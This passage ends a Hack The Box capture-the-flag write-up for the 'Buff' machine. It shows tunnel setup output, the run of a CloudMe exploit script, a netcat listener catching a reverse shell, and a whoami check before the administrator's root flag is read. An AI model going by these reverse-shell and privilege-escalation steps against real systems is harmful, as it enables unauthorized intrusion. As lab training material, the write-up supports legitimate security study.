2021/01/11 17:28:10 server: Fingerprint k7guofdpNxngA0JtqWLZqoGd8vRScrEYqypJELF8fdE=
2021/01/11 17:28:10 server: Listening on http://0.0.0.0:4446
2021/01/11 17:33:08 server: session#1: tun: proxy#R:8888=>8888: Listening
Run exploit
u505@naos:~/HTB/Machines/Buff$ python3 exploitcloudme.py
After 2 seconds the reverse shell opens.
u505@naos:~/HTB/Machines/Buff$ rlwrap nc -lnvp 4445
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Ncat: Connection from 10.10.10.198.
Ncat: Connection from 10.10.10.198:49946.
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator

C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
<ROOT_FLAG>
References
Daniel Simao 14:27, 11 January 2021 (EST)